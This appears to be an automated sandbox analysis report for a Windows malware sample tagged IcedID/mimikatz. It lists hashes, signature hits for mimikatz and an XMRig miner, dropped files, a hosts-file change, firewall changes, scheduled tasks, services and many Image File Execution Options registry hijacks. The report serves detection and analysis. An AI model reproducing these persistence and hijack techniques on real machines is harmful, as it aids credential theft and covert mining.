Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system -
submitted
09-04-2024 01:49
Behavioral task
behavioral1
Sample
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
-
Size
17.3MB
-
MD5
f44f00bd6fdabcab90742047cca0ba6a
-
SHA1
74f7b7d30ba4f1617d88b54727c18571c9d653ad
-
SHA256
f0329a613971c28b2db7b5adf34ed67d0a962e5a10ee2bcb77d3b92b8e03d294
-
SHA512
63a939a5bd20fb7ff5f4137998e1bb5ce656800cb82142f03c28bda75adb7f0a1ca2993cc4cd45de8052433426cf8e1346e35ec1c60104d92d377c7e7eb7df61
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description              pid   process      target process
PID 1612 created 2132    1612  kbejuig.exe  spoolsv.exe
-
Contacts a large (29289) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource  yara_rule
behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
-
UPX dump on OEP (original entry point) 38 IoCs
Processes:
resource  yara_rule
behavioral2/memory/800-0-0x0000000000400000-0x0000000000AA4000-memory.dmp  UPX
C:\Windows\mitbajei\kbejuig.exe  UPX
C:\Windows\mfckutrue\Corporate\vfshost.exe  UPX
behavioral2/memory/1144-134-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp  UPX
behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp  UPX
C:\Windows\Temp\mfckutrue\ligfuakbd.exe  UPX
behavioral2/memory/432-140-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/432-143-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
C:\Windows\Temp\ycubiyfde\kayllc.exe  UPX
behavioral2/memory/3260-151-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/4392-171-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/2960-175-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/4608-179-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3260-181-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/3324-184-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3760-188-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3260-190-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/372-194-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3260-201-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/4072-203-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/4948-207-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/4856-211-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3260-215-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/1100-216-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/2600-220-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3260-223-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/1604-225-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/2412-229-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/4540-232-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/220-233-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3260-235-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/1144-237-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  UPX
behavioral2/memory/3260-248-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/3260-249-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/3260-251-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/3260-253-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/3260-254-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
behavioral2/memory/3260-255-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  UPX
-
XMRig Miner payload 12 IoCs
Processes:
resource  yara_rule
behavioral2/memory/3260-181-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-190-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-201-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-215-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-223-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-235-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-248-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-249-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-251-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-253-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-254-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
behavioral2/memory/3260-255-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  xmrig
-
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
Processes:
resource  yara_rule
behavioral2/memory/800-0-0x0000000000400000-0x0000000000AA4000-memory.dmp  mimikatz
C:\Windows\mitbajei\kbejuig.exe  mimikatz
behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp  mimikatz
-
Drops file in Drivers directory 3 IoCs
Processes:
description                   ioc                                        process
File opened for modification  C:\Windows\system32\drivers\etc\hosts      kbejuig.exe
File created                  C:\Windows\system32\drivers\npf.sys        wpcap.exe
File created                  C:\Windows\system32\drivers\etc\hosts      kbejuig.exe
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid   process
1984  netsh.exe
1276  netsh.exe
-
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe  kbejuig.exe
-
Executes dropped EXE 28 IoCs
Processes:
pid   process
1688  kbejuig.exe
1612  kbejuig.exe
644   wpcap.exe
1712  crtyfytge.exe
1144  vfshost.exe
432   ligfuakbd.exe
4360  xohudmc.exe
3260  kayllc.exe
1624  ogiqci.exe
4392  ligfuakbd.exe
2960  ligfuakbd.exe
4608  ligfuakbd.exe
3324  ligfuakbd.exe
3760  ligfuakbd.exe
372   ligfuakbd.exe
4420  kbejuig.exe
4072  ligfuakbd.exe
4948  ligfuakbd.exe
4856  ligfuakbd.exe
1100  ligfuakbd.exe
2600  ligfuakbd.exe
1604  ligfuakbd.exe
2412  ligfuakbd.exe
4540  ligfuakbd.exe
220   ligfuakbd.exe
1144  ligfuakbd.exe
2368  iljtkedpu.exe
5328  kbejuig.exe
-
Loads dropped DLL 12 IoCs
Processes:
pid   process
644   wpcap.exe (9 entries)
1712  crtyfytge.exe (3 entries)
-
Processes:
resource  yara_rule
C:\Windows\mfckutrue\Corporate\vfshost.exe  upx
behavioral2/memory/1144-134-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp  upx
behavioral2/memory/1144-136-0x00007FF6D95F0000-0x00007FF6D96DE000-memory.dmp  upx
C:\Windows\Temp\mfckutrue\ligfuakbd.exe  upx
behavioral2/memory/432-140-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/432-143-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
C:\Windows\Temp\ycubiyfde\kayllc.exe  upx
behavioral2/memory/3260-151-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/4392-171-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/2960-175-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/4608-179-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3260-181-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/3324-184-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3760-188-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3260-190-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/372-194-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3260-201-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/4072-203-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/4948-207-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/4856-211-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3260-215-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/1100-216-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/2600-220-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3260-223-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/1604-225-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/2412-229-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/4540-232-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/220-233-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3260-235-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/1144-237-0x00007FF68CC50000-0x00007FF68CCAB000-memory.dmp  upx
behavioral2/memory/3260-248-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/3260-249-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/3260-251-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/3260-253-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/3260-254-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
behavioral2/memory/3260-255-0x00007FF6A3FA0000-0x00007FF6A40C0000-memory.dmp  upx
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
69    ifconfig.me
70    ifconfig.me
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
description  ioc  process
File created  C:\Windows\SysWOW64\ogiqci.exe  xohudmc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft  kbejuig.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751  kbejuig.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A  kbejuig.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A  kbejuig.exe
File created  C:\Windows\SysWOW64\Packet.dll  wpcap.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5  kbejuig.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE  kbejuig.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache  kbejuig.exe
File created  C:\Windows\SysWOW64\pthreadVC.dll  wpcap.exe
File created  C:\Windows\SysWOW64\wpcap.dll  wpcap.exe
File created  C:\Windows\system32\wpcap.dll  wpcap.exe
File opened for modification  C:\Windows\SysWOW64\ogiqci.exe  xohudmc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData  kbejuig.exe
File created  C:\Windows\system32\Packet.dll  wpcap.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies  kbejuig.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751  kbejuig.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content  kbejuig.exe
-
Drops file in Program Files directory 3 IoCs
Processes:
description   ioc                                      process
File created  C:\Program Files\WinPcap\rpcapd.exe      wpcap.exe
File created  C:\Program Files\WinPcap\LICENSE         wpcap.exe
File created  C:\Program Files\WinPcap\uninstall.exe   wpcap.exe
-
Drops file in Windows directory 60 IoCs
Processes:
description  ioc  process
File created  C:\Windows\mfckutrue\UnattendGC\docmicfg.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\docmicfg.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\tbejirgpe\iljtkedpu.exe  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\tucl-1.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\schoedcl.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\upbdrjv\swrpwe.exe  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\libxml2.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\vimpcsvc.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\tbejirgpe\wpcap.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\vimpcsvc.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\crli-0.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\posh-0.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\tibe-2.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\spoolsrv.xml  kbejuig.exe
File created  C:\Windows\mitbajei\svschost.xml  kbejuig.exe
File opened for modification  C:\Windows\mfckutrue\Corporate\log.txt  cmd.exe
File created  C:\Windows\mfckutrue\tbejirgpe\wpcap.exe  kbejuig.exe
File opened for modification  C:\Windows\mitbajei\vimpcsvc.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\AppCapture64.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\Corporate\mimidrv.sys  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\zlib1.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\schoedcl.xml  kbejuig.exe
File created  C:\Windows\mitbajei\docmicfg.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\Shellcode.ini  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\AppCapture32.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\coli-0.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\trch-1.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\svschost.exe  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\svschost.xml  kbejuig.exe
File created  C:\Windows\mitbajei\spoolsrv.xml  kbejuig.exe
File opened for modification  C:\Windows\mitbajei\kbejuig.exe  2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\ucl.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\xdvl-0.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\spoolsrv.exe  kbejuig.exe
File created  C:\Windows\mitbajei\vimpcsvc.xml  kbejuig.exe
File opened for modification  C:\Windows\mitbajei\svschost.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\tbejirgpe\scan.bat  kbejuig.exe
File created  C:\Windows\mfckutrue\tbejirgpe\Packet.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\vimpcsvc.exe  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\exma-1.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\ssleay32.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\spoolsrv.xml  kbejuig.exe
File opened for modification  C:\Windows\mitbajei\docmicfg.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\docmicfg.exe  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\schoedcl.exe  kbejuig.exe
File created  C:\Windows\mitbajei\schoedcl.xml  kbejuig.exe
File opened for modification  C:\Windows\mitbajei\schoedcl.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\Corporate\vfshost.exe  kbejuig.exe
File created  C:\Windows\mfckutrue\Corporate\mimilib.dll  kbejuig.exe
File opened for modification  C:\Windows\mfckutrue\tbejirgpe\Result.txt  iljtkedpu.exe
File opened for modification  C:\Windows\mfckutrue\tbejirgpe\Packet.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\cnli-1.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\svschost.xml  kbejuig.exe
File created  C:\Windows\ime\kbejuig.exe  kbejuig.exe
File created  C:\Windows\mitbajei\kbejuig.exe  2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\libeay32.dll  kbejuig.exe
File created  C:\Windows\mfckutrue\UnattendGC\specials\trfo-2.dll  kbejuig.exe
File opened for modification  C:\Windows\mitbajei\spoolsrv.xml  kbejuig.exe
File created  C:\Windows\mfckutrue\tbejirgpe\ip.txt  kbejuig.exe
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid   process
2052  sc.exe
4128  sc.exe
644   sc.exe
4036  sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource                                  yara_rule
C:\Windows\mitbajei\kbejuig.exe           nsis_installer_2
C:\Windows\mfckutrue\tbejirgpe\wpcap.exe  nsis_installer_1
C:\Windows\mfckutrue\tbejirgpe\wpcap.exe  nsis_installer_2
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid   process
5044  schtasks.exe
2092  schtasks.exe
912   schtasks.exe
-
Modifies data under HKEY_USERS 43 IoCs
Processes:
description  ioc  process
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  kbejuig.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"  kbejuig.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  kbejuig.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  kbejuig.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  kbejuig.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software  ligfuakbd.exe
